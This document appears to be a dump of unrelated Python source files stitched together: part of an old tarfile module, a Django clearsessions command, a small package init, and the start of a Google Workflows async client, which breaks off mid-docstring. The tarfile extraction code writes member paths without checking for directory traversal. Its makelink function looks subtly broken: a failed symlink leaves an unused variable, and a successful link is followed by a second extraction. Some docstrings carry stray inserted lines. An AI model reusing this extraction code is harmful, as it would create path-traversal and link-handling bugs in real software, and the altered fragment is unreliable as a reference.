bz2.BZ2File(name, mode, compresslevel=compresslevel) try: t = cls.taropen(name, mode, fileobj, **kwargs) except (IOError, EOFError): fileobj.close() raise ReadError("not a bzip2 file") t._extfileobj = False return t # All *open() methods are registered here. OPEN_METH = { "tar": "taropen", # uncompressed tar "gz": "gzopen", # gzip compressed tar "bz2": "bz2open" # bzip2 compressed tar } #-------------------------------------------------------------------------- # The public methods which TarFile provides: def close(self): """Close the TarFile. In write-mode, two finishing zero blocks are appended to the archive. 
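           The archive is then padded with zero blocks up to a multiple of
           RECORDSIZE, mirroring GNU tar's default blocking factor of 20.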
""" if self.closed: return if self.mode in "aw": self.fileobj.write(NUL * (BLOCKSIZE * 2)) self.offset += (BLOCKSIZE * 2) # fill up the end with zero-blocks # (like option -b20 for tar does) blocks, remainder = divmod(self.offset, RECORDSIZE) if remainder > 0: self.fileobj.write(NUL * (RECORDSIZE - remainder)) if not self._extfileobj: self.fileobj.close() self.closed = True def getmember(self, name): """Return a TarInfo object for member `name'. If `name' can not be found in the archive, KeyError is raised. If a member occurs more than once in the archive, its last occurrence is assumed to be the most up-to-date version. """ tarinfo = self._getmember(name) if tarinfo is None: raise KeyError("filename %r not found" % name) return tarinfo def getmembers(self): """Return the members of the archive as a list of TarInfo objects. The list has the same order as the members in the archive. """ self._check() if not self._loaded: # if we want to obtain a list of self._load() # all members, we first have to # scan the whole archive. return self.members def getnames(self): """Return the members of the archive as a list of their names. It has the same order as the list returned by getmembers(). """ return [tarinfo.name for tarinfo in self.getmembers()] def gettarinfo(self, name=None, arcname=None, fileobj=None): """Create a TarInfo object for either the file `name' or the file object `fileobj' (using os.fstat on its file descriptor). You can modify some of the TarInfo's attributes before you add it using addfile(). If given, `arcname' specifies an alternative name for the file in the archive. """ self._check("aw") # When fileobj is given, replace name by # fileobj's real name. if fileobj is not None: name = fileobj.name # Building the name of the member in the archive. # Backward slashes are converted to forward slashes, # Absolute paths are turned to relative paths. if arcname is None: arcname = name drv, arcname = os.path.splitdrive(arcname) arcname = arcname.replace(os.sep, "/") arcname = arcname.lstrip("/") # Now, fill the TarInfo object with # information specific for the file. tarinfo = self.tarinfo() tarinfo.tarfile = self # Use os.stat or os.lstat, depending on platform # and if symlinks shall be resolved. if fileobj is None: if hasattr(os, "lstat") and not self.dereference: statres = os.lstat(name) else: statres = os.stat(name) else: statres = os.fstat(fileobj.fileno()) linkname = "" stmd = statres.st_mode if stat.S_ISREG(stmd): inode = (statres.st_ino, statres.st_dev) if not self.dereference and statres.st_nlink > 1 and \ inode in self.inodes and arcname != self.inodes[inode]: # Is it a hardlink to an already # archived file? type = LNKTYPE linkname = self.inodes[inode] else: # The inode is added only if its valid. # For win32 it is always 0. type = REGTYPE if inode[0]: self.inodes[inode] = arcname elif stat.S_ISDIR(stmd): type = DIRTYPE elif stat.S_ISFIFO(stmd): type = FIFOTYPE elif stat.S_ISLNK(stmd): type = SYMTYPE linkname = os.readlink(name) elif stat.S_ISCHR(stmd): type = CHRTYPE elif stat.S_ISBLK(stmd): type = BLKTYPE else: return None # Fill the TarInfo object with all # information we can get. 
tarinfo.name = arcname tarinfo.mode = stmd tarinfo.uid = statres.st_uid tarinfo.gid = statres.st_gid if type == REGTYPE: tarinfo.size = statres.st_size else: tarinfo.size = 0 tarinfo.mtime = statres.st_mtime tarinfo.type = type tarinfo.linkname = linkname if pwd: try: tarinfo.uname = pwd.getpwuid(tarinfo.uid)[0] except KeyError: pass if grp: try: tarinfo.gname = grp.getgrgid(tarinfo.gid)[0] except KeyError: pass if type in (CHRTYPE, BLKTYPE): if hasattr(os, "major") and hasattr(os, "minor"): tarinfo.devmajor = os.major(statres.st_rdev) tarinfo.devminor = os.minor(statres.st_rdev) return tarinfo def list(self, verbose=True): """Print a table of contents to sys.stdout. If `verbose' is False, only the names of the members are printed. If it is True, an `ls -l'-like output is produced. """ self._check() for tarinfo in self: if verbose: print(filemode(tarinfo.mode), end=' ') print("%s/%s" % (tarinfo.uname or tarinfo.uid, tarinfo.gname or tarinfo.gid), end=' ') if tarinfo.ischr() or tarinfo.isblk(): print("%10s" % ("%d,%d" \ % (tarinfo.devmajor, tarinfo.devminor)), end=' ') else: print("%10d" % tarinfo.size, end=' ') print("%d-%02d-%02d %02d:%02d:%02d" \ % time.localtime(tarinfo.mtime)[:6], end=' ') print(tarinfo.name + ("/" if tarinfo.isdir() else ""), end=' ') if verbose: if tarinfo.issym(): print("->", tarinfo.linkname, end=' ') if tarinfo.islnk(): print("link to", tarinfo.linkname, end=' ') print() def add(self, name, arcname=None, recursive=True, exclude=None, filter=None): """Add the file `name' to the archive. `name' may be any type of file (directory, fifo, symbolic link, etc.). If given, `arcname' specifies an alternative name for the file in the archive. Directories are added recursively by default. This can be avoided by setting `recursive' to False. `exclude' is a function that should return True for each filename to be excluded. `filter' is a function that expects a TarInfo object argument and returns the changed TarInfo object, if it returns None the TarInfo object will be excluded from the archive. """ self._check("aw") if arcname is None: arcname = name # Exclude pathnames. if exclude is not None: import warnings warnings.warn("use the filter argument instead", DeprecationWarning, 2) if exclude(name): self._dbg(2, "tarfile: Excluded %r" % name) return # Skip if somebody tries to archive the archive... if self.name is not None and os.path.abspath(name) == self.name: self._dbg(2, "tarfile: Skipped %r" % name) return self._dbg(1, name) # Create a TarInfo object from the file. tarinfo = self.gettarinfo(name, arcname) if tarinfo is None: self._dbg(1, "tarfile: Unsupported type %r" % name) return # Change or exclude the TarInfo object. if filter is not None: tarinfo = filter(tarinfo) if tarinfo is None: self._dbg(2, "tarfile: Excluded %r" % name) return # Append the tar header and data to the archive. if tarinfo.isreg(): f = bltn_open(name, "rb") self.addfile(tarinfo, f) f.close() elif tarinfo.isdir(): self.addfile(tarinfo) if recursive: for f in os.listdir(name): self.add(os.path.join(name, f), os.path.join(arcname, f), recursive, exclude, filter=filter) else: self.addfile(tarinfo) def addfile(self, tarinfo, fileobj=None): """Add the TarInfo object `tarinfo' to the archive. If `fileobj' is given, tarinfo.size bytes are read from it and added to the archive. You can create TarInfo objects using gettarinfo(). On Windows platforms, `fileobj' should always be opened with mode 'rb' to avoid irritation about the file size. 
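           The member's data is padded with NUL bytes up to the next multiple
           of BLOCKSIZE (512 bytes).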
""" self._check("aw") tarinfo = copy.copy(tarinfo) buf = tarinfo.tobuf(self.format, self.encoding, self.errors) self.fileobj.write(buf) self.offset += len(buf) # If there's data to follow, append it. if fileobj is not None: copyfileobj(fileobj, self.fileobj, tarinfo.size) blocks, remainder = divmod(tarinfo.size, BLOCKSIZE) if remainder > 0: self.fileobj.write(NUL * (BLOCKSIZE - remainder)) blocks += 1 self.offset += blocks * BLOCKSIZE self.members.append(tarinfo) def extractall(self, path=".", members=None): """Extract all members from the archive to the current working directory and set owner, modification time and permissions on directories afterwards. `path' specifies a different directory to extract to. `members' is optional and must be a subset of the list returned by getmembers(). """ directories = [] if members is None: members = self for tarinfo in members: if tarinfo.isdir(): # Extract directories with a safe mode. directories.append(tarinfo) tarinfo = copy.copy(tarinfo) tarinfo.mode = 0o700 # Do not set_attrs directories, as we will do that further down self.extract(tarinfo, path, set_attrs=not tarinfo.isdir()) # Reverse sort directories. directories.sort(key=lambda a: a.name) directories.reverse() # Set correct owner, mtime and filemode on directories. for tarinfo in directories: dirpath = os.path.join(path, tarinfo.name) try: self.chown(tarinfo, dirpath) self.utime(tarinfo, dirpath) self.chmod(tarinfo, dirpath) except ExtractError as e: if self.errorlevel > 1: raise else: self._dbg(1, "tarfile: %s" % e) def extract(self, member, path="", set_attrs=True): """Extract a member from the archive to the current working directory, using its full name. Its file information is extracted as accurately as possible. `member' may be a filename or a TarInfo object. You can specify a different directory using `path'. File attributes (owner, mtime, mode) are set unless `set_attrs' is False. """ self._check("r") if isinstance(member, str): tarinfo = self.getmember(member) else: tarinfo = member # Prepare the link target for makelink(). if tarinfo.islnk(): tarinfo._link_target = os.path.join(path, tarinfo.linkname) try: self._extract_member(tarinfo, os.path.join(path, tarinfo.name), set_attrs=set_attrs) except EnvironmentError as e: if self.errorlevel > 0: raise else: if e.filename is None: self._dbg(1, "tarfile: %s" % e.strerror) else: self._dbg(1, "tarfile: %s %r" % (e.strerror, e.filename)) except ExtractError as e: if self.errorlevel > 1: raise else: self._dbg(1, "tarfile: %s" % e) def extractfile(self, member): """Extract a member from the archive as a file object. `member' may be a filename or a TarInfo object. If `member' is a regular file, a file-like object is returned. If `member' is a link, a file-like object is constructed from the link's target. If `member' is none of the above, None is returned. The file-like object is read-only and provides the following methods: read(), readline(), readlines(), seek() and tell() """ self._check("r") if isinstance(member, str): tarinfo = self.getmember(member) else: tarinfo = member if tarinfo.isreg(): return self.fileobject(self, tarinfo) elif tarinfo.type not in SUPPORTED_TYPES: # If a member's type is unknown, it is treated as a # regular file. return self.fileobject(self, tarinfo) elif tarinfo.islnk() or tarinfo.issym(): if isinstance(self.fileobj, _Stream): # A small but ugly workaround for the case that someone tries # to extract a (sym)link as a file-object from a non-seekable # stream of tar blocks. 
raise StreamError("cannot extract (sym)link as file object") else: # A (sym)link's file object is its target's file object. return self.extractfile(self._find_link_target(tarinfo)) else: # If there's no data associated with the member (directory, chrdev, # blkdev, etc.), return None instead of a file object. return None def _extract_member(self, tarinfo, targetpath, set_attrs=True): """Extract the TarInfo object tarinfo to a physical file called targetpath. """ # Fetch the TarInfo object for the given name # and build the destination pathname, replacing # forward slashes to platform specific separators. targetpath = targetpath.rstrip("/") targetpath = targetpath.replace("/", os.sep) # Create all upper directories. upperdirs = os.path.dirname(targetpath) if upperdirs and not os.path.exists(upperdirs): # Create directories that are not part of the archive with # default permissions. os.makedirs(upperdirs) if tarinfo.islnk() or tarinfo.issym(): self._dbg(1, "%s -> %s" % (tarinfo.name, tarinfo.linkname)) else: self._dbg(1, tarinfo.name) if tarinfo.isreg(): self.makefile(tarinfo, targetpath) elif tarinfo.isdir(): self.makedir(tarinfo, targetpath) elif tarinfo.isfifo(): self.makefifo(tarinfo, targetpath) elif tarinfo.ischr() or tarinfo.isblk(): self.makedev(tarinfo, targetpath) elif tarinfo.islnk() or tarinfo.issym(): self.makelink(tarinfo, targetpath) elif tarinfo.type not in SUPPORTED_TYPES: self.makeunknown(tarinfo, targetpath) else: self.makefile(tarinfo, targetpath) if set_attrs: self.chown(tarinfo, targetpath) if not tarinfo.issym(): self.chmod(tarinfo, targetpath) self.utime(tarinfo, targetpath) #-------------------------------------------------------------------------- # Below are the different file methods. They are called via # _extract_member() when extract() is called. They can be replaced in a # subclass to implement other functionality. def makedir(self, tarinfo, targetpath): """Make a directory called targetpath. """ try: # Use a safe mode for the directory, the real mode is set # later in _extract_member(). os.mkdir(targetpath, 0o700) except EnvironmentError as e: if e.errno != errno.EEXIST: raise def makefile(self, tarinfo, targetpath): """Make a file called targetpath. """ source = self.fileobj source.seek(tarinfo.offset_data) target = bltn_open(targetpath, "wb") if tarinfo.sparse is not None: for offset, size in tarinfo.sparse: target.seek(offset) copyfileobj(source, target, size) else: copyfileobj(source, target, tarinfo.size) target.seek(tarinfo.size) target.truncate() target.close() def makeunknown(self, tarinfo, targetpath): """Make a file from a TarInfo object with an unknown type at targetpath. """ self.makefile(tarinfo, targetpath) self._dbg(1, "tarfile: Unknown file type %r, " \ "extracted as regular file." % tarinfo.type) def makefifo(self, tarinfo, targetpath): """Make a fifo called targetpath. """ if hasattr(os, "mkfifo"): os.mkfifo(targetpath) else: raise ExtractError("fifo not supported by system") def makedev(self, tarinfo, targetpath): """Make a character or block device called targetpath. """ if not hasattr(os, "mknod") or not hasattr(os, "makedev"): raise ExtractError("special devices not supported by system") mode = tarinfo.mode if tarinfo.isblk(): mode |= stat.S_IFBLK else: mode |= stat.S_IFCHR os.mknod(targetpath, mode, os.makedev(tarinfo.devmajor, tarinfo.devminor)) def makelink(self, tarinfo, targetpath): """Make a (symbolic) link called targetpath. 
If it cannot be created (platform limitation), we try to make a copy of the referenced file instead of a link. """ try: # For systems that support symbolic and hard links. if tarinfo.issym(): os.symlink(tarinfo.linkname, targetpath) else: # See extract(). if os.path.exists(tarinfo._link_target): os.link(tarinfo._link_target, targetpath) else: self._extract_member(self._find_link_target(tarinfo), targetpath) except symlink_exception: if tarinfo.issym(): linkpath = os.path.join(os.path.dirname(tarinfo.name), tarinfo.linkname) else: linkpath = tarinfo.linkname else: try: self._extract_member(self._find_link_target(tarinfo), targetpath) except KeyError: raise ExtractError("unable to resolve link inside archive") def chown(self, tarinfo, targetpath): """Set owner of targetpath according to tarinfo. """ if pwd and hasattr(os, "geteuid") and os.geteuid() == 0: # We have to be root to do so. try: g = grp.getgrnam(tarinfo.gname)[2] except KeyError: g = tarinfo.gid try: u = pwd.getpwnam(tarinfo.uname)[2] except KeyError: u = tarinfo.uid try: if tarinfo.issym() and hasattr(os, "lchown"): os.lchown(targetpath, u, g) else: if sys.platform != "os2emx": os.chown(targetpath, u, g) except EnvironmentError as e: raise ExtractError("could not change owner") def chmod(self, tarinfo, targetpath): """Set file permissions of targetpath according to tarinfo. """ if hasattr(os, 'chmod'): try: os.chmod(targetpath, tarinfo.mode) except EnvironmentError as e: raise ExtractError("could not change mode") def utime(self, tarinfo, targetpath): """Set modification time of targetpath according to tarinfo. """ if not hasattr(os, 'utime'): return try: os.utime(targetpath, (tarinfo.mtime, tarinfo.mtime)) except EnvironmentError as e: raise ExtractError("could not change modification time") #-------------------------------------------------------------------------- def next(self): """Return the next member of the archive as a TarInfo object, when TarFile is opened for reading. Return None if there is no more available. """ self._check("ra") if self.firstmember is not None: m = self.firstmember self.firstmember = None return m # Read the next block. self.fileobj.seek(self.offset) tarinfo = None while True: try: tarinfo = self.tarinfo.fromtarfile(self) except EOFHeaderError as e: if self.ignore_zeros: self._dbg(2, "0x%X: %s" % (self.offset, e)) self.offset += BLOCKSIZE continue except InvalidHeaderError as e: if self.ignore_zeros: self._dbg(2, "0x%X: %s" % (self.offset, e)) self.offset += BLOCKSIZE continue elif self.offset == 0: raise ReadError(str(e)) except EmptyHeaderError: if self.offset == 0: raise ReadError("empty file") except TruncatedHeaderError as e: if self.offset == 0: raise ReadError(str(e)) except SubsequentHeaderError as e: raise ReadError(str(e)) break if tarinfo is not None: self.members.append(tarinfo) else: self._loaded = True return tarinfo #-------------------------------------------------------------------------- # Little helper methods: def _getmember(self, name, tarinfo=None, normalize=False): """Find an archive member by name from bottom to top. If tarinfo is given, it is used as the starting point. """ # Ensure that all members have been loaded. members = self.getmembers() # Limit the member search list up to tarinfo. 
if tarinfo is not None: members = members[:members.index(tarinfo)] if normalize: name = os.path.normpath(name) for member in reversed(members): if normalize: member_name = os.path.normpath(member.name) else: member_name = member.name if name == member_name: return member def _load(self): """Read through the entire archive file and look for readable members. """ while True: tarinfo = self.next() if tarinfo is None: break self._loaded = True def _check(self, mode=None): """Check if TarFile is still open, and if the operation's mode corresponds to TarFile's mode. """ if self.closed: raise IOError("%s is closed" % self.__class__.__name__) if mode is not None and self.mode not in mode: raise IOError("bad operation for mode %r" % self.mode) def _find_link_target(self, tarinfo): """Find the target member of a symlink or hardlink member in the archive. """ if tarinfo.issym(): # Always search the entire archive. linkname = os.path.dirname(tarinfo.name) + "/" + tarinfo.linkname limit = None else: # Search the archive before the link, because a hard link is # just a reference to an already archived file. linkname = tarinfo.linkname limit = tarinfo member = self._getmember(linkname, tarinfo=limit, normalize=True) if member is None: raise KeyError("linkname %r not found" % linkname) return member def __iter__(self): """Provide an iterator object. """ if self._loaded: return iter(self.members) else: return TarIter(self) def _dbg(self, level, msg): """Write debugging output to sys.stderr. """ if level <= self.debug: print(msg, file=sys.stderr) def __enter__(self): self._check() return self def __exit__(self, type, value, traceback): if type is None: self.close() else: # An exception occurred. We must not call close() because # it would try to write end-of-archive blocks and padding. if not self._extfileobj: self.fileobj.close() self.closed = True # class TarFile class TarIter(object): """Iterator Class. for tarinfo in TarFile(...): suite... """ def __init__(self, tarfile): """Construct a TarIter object. """ self.tarfile = tarfile self.index = 0 def __iter__(self): """Return iterator object. """ return self def __next__(self): """Return the next item using TarFile's next() method. When all members have been read, set TarFile as _loaded. """ # Fix for SF #1100429: Under rare circumstances it can # happen that getmembers() is called during iteration, # which will cause TarIter to stop prematurely. if not self.tarfile._loaded: tarinfo = self.tarfile.next() if not tarinfo: self.tarfile._loaded = True raise StopIteration else: try: tarinfo = self.tarfile.members[self.index] except IndexError: raise StopIteration self.index += 1 return tarinfo next = __next__ # for Python 2.x #-------------------- # exported functions #-------------------- def is_tarfile(name): """Return True if name points to a tar archive that we are able to handle, else return False. """ try: t = open(name) t.close() return True except TarError: return False bltn_open = open open = TarFile.open
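The extractall/extract/extractfile methods above are the standard tarfile extraction API. A minimal usage sketch against the stdlib tarfile module follows; the archive name and output directory are made up for illustration.

import tarfile

# Open a (hypothetical) gzip-compressed archive, list its members,
# then extract everything into a scratch directory.
with tarfile.open("example.tar.gz", "r:gz") as archive:
    for member in archive.getmembers():
        print(member.name, member.size)
    archive.extractall(path="extracted")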
frankvdp/django
refs/heads/master
django/contrib/sessions/management/commands/clearsessions.py
729
from importlib import import_module from django.conf import settings from django.core.management.base import BaseCommand class Command(BaseCommand): help = ( "Can be run as a cronjob or directly to clean out expired sessions " "(only with the database backend at the moment)." ) def handle(self, **options): engine = import_module(settings.SESSION_ENGINE) try: engine.SessionStore.clear_expired() except NotImplementedError: self.stderr.write("Session engine '%s' doesn't support clearing " "expired sessions.\n" % settings.SESSION_ENGINE)
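Besides running it from cron, the command above can be exercised programmatically through Django's call_command helper; this sketch assumes a configured Django project whose session engine supports clear_expired().

from django.core.management import call_command

# Equivalent to running `python manage.py clearsessions` from the shell.
call_command("clearsessions")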
d-plaindoux/fluent-rest
refs/heads/master
fluent_rest/spec/__init__.py
1
# Copyright (C)2016 D. Plaindoux. # # This program is free software; you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation; either version 2, or (at your option) any # later version. from fluent_rest.spec.rest import *
googleapis/python-workflows
refs/heads/master
google/cloud/workflows_v1/services/workflows/async_client.py
1
# -*- coding: utf-8 -*- # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from collections import OrderedDict import functools import re from typing import Dict, Sequence, Tuple, Type, Union import pkg_resources import google.api_core.client_options as ClientOptions # type: ignore from google.api_core import exceptions as core_exceptions # type: ignore from google.api_core import gapic_v1 # type: ignore from google.api_core import retry as retries # type: ignore from google.auth import credentials as ga_credentials # type: ignore from google.oauth2 import service_account # type: ignore from google.api_core import operation # type: ignore from google.api_core import operation_async # type: ignore from google.cloud.workflows_v1.services.workflows import pagers from google.cloud.workflows_v1.types import workflows from google.protobuf import empty_pb2 # type: ignore from google.protobuf import field_mask_pb2 # type: ignore from google.protobuf import timestamp_pb2 # type: ignore from .transports.base import WorkflowsTransport, DEFAULT_CLIENT_INFO from .transports.grpc_asyncio import WorkflowsGrpcAsyncIOTransport from .client import WorkflowsClient class WorkflowsAsyncClient: """Workflows is used to deploy and execute workflow programs. Workflows makes sure the program executes reliably, despite hardware and networking interruptions. """ _client: WorkflowsClient DEFAULT_ENDPOINT = WorkflowsClient.DEFAULT_ENDPOINT DEFAULT_MTLS_ENDPOINT = WorkflowsClient.DEFAULT_MTLS_ENDPOINT workflow_path = staticmethod(WorkflowsClient.workflow_path) parse_workflow_path = staticmethod(WorkflowsClient.parse_workflow_path) common_billing_account_path = staticmethod( WorkflowsClient.common_billing_account_path ) parse_common_billing_account_path = staticmethod( WorkflowsClient.parse_common_billing_account_path ) common_folder_path = staticmethod(WorkflowsClient.common_folder_path) parse_common_folder_path = staticmethod(WorkflowsClient.parse_common_folder_path) common_organization_path = staticmethod(WorkflowsClient.common_organization_path) parse_common_organization_path = staticmethod( WorkflowsClient.parse_common_organization_path ) common_project_path = staticmethod(WorkflowsClient.common_project_path) parse_common_project_path = staticmethod(WorkflowsClient.parse_common_project_path) common_location_path = staticmethod(WorkflowsClient.common_location_path) parse_common_location_path = staticmethod( WorkflowsClient.parse_common_location_path ) @classmethod def from_service_account_info(cls, info: dict, *args, **kwargs): """Creates an instance of this client using the provided credentials info. Args: info (dict): The service account private key info. args: Additional arguments to pass to the constructor. kwargs: Additional arguments to pass to the constructor. Returns: WorkflowsAsyncClient: The constructed client. 
""" return WorkflowsClient.from_service_account_info.__func__(WorkflowsAsyncClient, info, *args, **kwargs) # type: ignore @classmethod def from_service_account_file(cls, filename: str, *args, **kwargs): """Creates an instance of this client using the provided credentials file. Args: filename (str): The path to the service account private key json file. args: Additional arguments to pass to the constructor. kwargs: Additional arguments to pass to the constructor. Returns: WorkflowsAsyncClient: The constructed client. """ return WorkflowsClient.from_service_account_file.__func__(WorkflowsAsyncClient, filename, *args, **kwargs) # type: ignore from_service_account_json = from_service_account_file @property def transport(self) -> WorkflowsTransport: """Returns the transport used by the client instance. Returns: WorkflowsTransport: The transport used by the client instance. """ return self._client.transport get_transport_class = functools.partial( type(WorkflowsClient).get_transport_class, type(WorkflowsClient) ) def __init__( self, *, credentials: ga_credentials.Credentials = None, transport: Union[str, WorkflowsTransport] = "grpc_asyncio", client_options: ClientOptions = None, client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO, ) -> None: """Instantiates the workflows client. Args: credentials (Optional[google.auth.credentials.Credentials]): The authorization credentials to attach to requests. These credentials identify the application to the service; if none are specified, the client will attempt to ascertain the credentials from the environment. transport (Union[str, ~.WorkflowsTransport]): The transport to use. If set to None, a transport is chosen automatically. client_options (ClientOptions): Custom options for the client. It won't take effect if a ``transport`` instance is provided. (1) The ``api_endpoint`` property can be used to override the default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT environment variable can also be used to override the endpoint: "always" (always use the default mTLS endpoint), "never" (always use the default regular endpoint) and "auto" (auto switch to the default mTLS endpoint if client certificate is present, this is the default value). However, the ``api_endpoint`` property takes precedence if provided. (2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable is "true", then the ``client_cert_source`` property can be used to provide client certificate for mutual TLS transport. If not provided, the default SSL client certificate will be used if present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not set, no client certificate will be used. Raises: google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport creation failed for any reason. """ self._client = WorkflowsClient( credentials=credentials, transport=transport, client_options=client_options, client_info=client_info, ) async def list_workflows( self, request: workflows.ListWorkflowsRequest = None, *, parent: str = None, retry: retries.Retry = gapic_v1.method.DEFAULT, timeout: float = None, metadata: Sequence[Tuple[str, str]] = (), ) -> pagers.ListWorkflowsAsyncPager: r"""Lists Workflows in a given project and location. The default order is not specified. Args: request (:class:`google.cloud.workflows_v1.types.ListWorkflowsRequest`): The request object. Request for the [ListWorkflows][google.cloud.workflows.v1.Workflows.ListWorkflows] method. parent (:class:`str`): Required. Project and location from which the workflows should be listed. 
Format: projects/{project}/locations/{location} This corresponds to the ``parent`` field on the ``request`` instance; if ``request`` is provided, this should not be set. retry (google.api_core.retry.Retry): Designation of what errors, if any, should be retried. timeout (float): The timeout for this request. metadata (Sequence[Tuple[str, str]]): Strings which should be sent along with the request as metadata. Returns: google.cloud.workflows_v1.services.workflows.pagers.ListWorkflowsAsyncPager: Response for the [ListWorkflows][google.cloud.workflows.v1.Workflows.ListWorkflows] method. Iterating over this object will yield results and resolve additional pages automatically. """ # Create or coerce a protobuf request object. # Sanity check: If we got a request object, we should *not* have # gotten any keyword arguments that map to the request. has_flattened_params = any([parent]) if request is not None and has_flattened_params: raise ValueError( "If the `request` argument is set, then none of " "the individual field arguments should be set." ) request = workflows.ListWorkflowsRequest(request) # If we have keyword arguments corresponding to fields on the # request, apply these. if parent is not None: request.parent = parent # Wrap the RPC method; this adds retry and timeout information, # and friendly error handling. rpc = gapic_v1.method_async.wrap_method( self._client._transport.list_workflows, default_timeout=None, client_info=DEFAULT_CLIENT_INFO, ) # Certain fields should be provided within the metadata header; # add these here. metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)), ) # Send the request. response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,) # This method is paged; wrap the response in a pager, which provides # an `__aiter__` convenience method. response = pagers.ListWorkflowsAsyncPager( method=rpc, request=request, response=response, metadata=metadata, ) # Done; return the response. return response async def get_workflow( self, request: workflows.GetWorkflowRequest = None, *, name: str = None, retry: retries.Retry = gapic_v1.method.DEFAULT, timeout: float = None, metadata: Sequence[Tuple[str, str]] = (), ) -> workflows.Workflow: r"""Gets details of a single Workflow. Args: request (:class:`google.cloud.workflows_v1.types.GetWorkflowRequest`): The request object. Request for the [GetWorkflow][google.cloud.workflows.v1.Workflows.GetWorkflow] method. name (:class:`str`): Required. Name of the workflow which information should be retrieved. Format: projects/{project}/locations/{location}/workflows/{workflow} This corresponds to the ``name`` field on the ``request`` instance; if ``request`` is provided, this should not be set. retry (google.api_core.retry.Retry): Designation of what errors, if any, should be retried. timeout (float): The timeout for this request. metadata (Sequence[Tuple[str, str]]): Strings which should be sent along with the request as metadata. Returns: google.cloud.workflows_v1.types.Workflow: Workflow program to be executed by Workflows. """ # Create or coerce a protobuf request object. # Sanity check: If we got a request object, we should *not* have # gotten any keyword arguments that map to the request. has_flattened_params = any([name]) if request is not None and has_flattened_params: raise ValueError( "If the `request` argument is set, then none of " "the individual field arguments should be set." 
) request = workflows.GetWorkflowRequest(request) # If we have keyword arguments corresponding to fields on the # request, apply these. if name is not None: request.name = name # Wrap the RPC method; this adds retry and timeout information, # and friendly error handling. rpc = gapic_v1.method_async.wrap_method( self._client._transport.get_workflow, default_timeout=None, client_info=DEFAULT_CLIENT_INFO, ) # Certain fields should be provided within the metadata header; # add these here. metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)), ) # Send the request. response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,) # Done; return the response. return response async def create_workflow( self, request: workflows.CreateWorkflowRequest = None, *, parent: str = None, workflow: workflows.Workflow = None, workflow_id: str = None, retry: retries.Retry = gapic_v1.method.DEFAULT, timeout: float = None, metadata: Sequence[Tuple[str, str]] = (), ) -> operation_async.AsyncOperation: r"""Creates a new workflow. If a workflow with the specified name already exists in the specified project and location, the long running operation will return [ALREADY_EXISTS][google.rpc.Code.ALREADY_EXISTS] error. Args: request (:class:`google.cloud.workflows_v1.types.CreateWorkflowRequest`): The request object. Request for the [CreateWorkflow][google.cloud.workflows.v1.Workflows.CreateWorkflow] method. parent (:class:`str`): Required. Project and location in which the workflow should be created. Format: projects/{project}/locations/{location} This corresponds to the ``parent`` field on the ``request`` instance; if ``request`` is provided, this should not be set. workflow (:class:`google.cloud.workflows_v1.types.Workflow`): Required. Workflow to be created. This corresponds to the ``workflow`` field on the ``request`` instance; if ``request`` is provided, this should not be set. workflow_id (:class:`str`): Required. The ID of the workflow to be created. It has to fulfill the following requirements: - Must contain only letters, numbers, underscores and hyphens. - Must start with a letter. - Must be between 1-64 characters. - Must end with a number or a letter. - Must be unique within the customer project and location. This corresponds to the ``workflow_id`` field on the ``request`` instance; if ``request`` is provided, this should not be set. retry (google.api_core.retry.Retry): Designation of what errors, if any, should be retried. timeout (float): The timeout for this request. metadata (Sequence[Tuple[str, str]]): Strings which should be sent along with the request as metadata. Returns: google.api_core.operation_async.AsyncOperation: An object representing a long-running operation. The result type for the operation will be :class:`google.cloud.workflows_v1.types.Workflow` Workflow program to be executed by Workflows. """ # Create or coerce a protobuf request object. # Sanity check: If we got a request object, we should *not* have # gotten any keyword arguments that map to the request. has_flattened_params = any([parent, workflow, workflow_id]) if request is not None and has_flattened_params: raise ValueError( "If the `request` argument is set, then none of " "the individual field arguments should be set." ) request = workflows.CreateWorkflowRequest(request) # If we have keyword arguments corresponding to fields on the # request, apply these. 
if parent is not None: request.parent = parent if workflow is not None: request.workflow = workflow if workflow_id is not None: request.workflow_id = workflow_id # Wrap the RPC method; this adds retry and timeout information, # and friendly error handling. rpc = gapic_v1.method_async.wrap_method( self._client._transport.create_workflow, default_timeout=None, client_info=DEFAULT_CLIENT_INFO, ) # Certain fields should be provided within the metadata header; # add these here. metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)), ) # Send the request. response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,) # Wrap the response in an operation future. response = operation_async.from_gapic( response, self._client._transport.operations_client, workflows.Workflow, metadata_type=workflows.OperationMetadata, ) # Done; return the response. return response async def delete_workflow( self, request: workflows.DeleteWorkflowRequest = None, *, name: str = None, retry: retries.Retry = gapic_v1.method.DEFAULT, timeout: float = None, metadata: Sequence[Tuple[str, str]] = (), ) -> operation_async.AsyncOperation: r"""Deletes a workflow with the specified name. This method also cancels and deletes all running executions of the workflow. Args: request (:class:`google.cloud.workflows_v1.types.DeleteWorkflowRequest`): The request object. Request for the [DeleteWorkflow][google.cloud.workflows.v1.Workflows.DeleteWorkflow] method. name (:class:`str`): Required. Name of the workflow to be deleted. Format: projects/{project}/locations/{location}/workflows/{workflow} This corresponds to the ``name`` field on the ``request`` instance; if ``request`` is provided, this should not be set. retry (google.api_core.retry.Retry): Designation of what errors, if any, should be retried. timeout (float): The timeout for this request. metadata (Sequence[Tuple[str, str]]): Strings which should be sent along with the request as metadata. Returns: google.api_core.operation_async.AsyncOperation: An object representing a long-running operation. The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated empty messages in your APIs. A typical example is to use it as the request or the response type of an API method. For instance: service Foo { 